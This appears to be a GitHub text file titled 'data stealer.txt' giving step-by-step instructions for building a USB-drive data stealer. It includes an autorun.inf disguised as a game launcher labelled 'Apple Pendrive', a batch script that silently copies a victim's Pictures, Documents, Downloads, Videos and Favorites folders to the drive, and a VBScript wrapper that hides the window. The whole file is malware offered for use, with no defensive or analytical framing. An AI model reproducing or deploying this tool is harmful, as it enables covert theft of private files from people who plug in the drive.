-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdata stealer.txt
44 lines (31 loc) · 902 Bytes
/
data stealer.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Step 1: Open notepad.
[autorun]
icon=Devicon.ico
label=Apple Pendrive
open=launch.bat
action=Click ok to Run game for Windows
shell\open\command=launch.bat
Save As...autorun.inf
Step 2:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\videos"
%backupcmd% "%USERPROFILE%\Downloads" "%drive%\all\Downloads"
%backupcmd% "%USERPROFILE%\Documents" "%drive%\all\Documents"
@echo off
cls
Save as...file.bat
Step 3:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Save as...invisible.vbs
Step 4:
wscript.exe \invisible.vbs file.bat
Save as...launch.bat
Step 5:
copy all the 4 files to pendrive.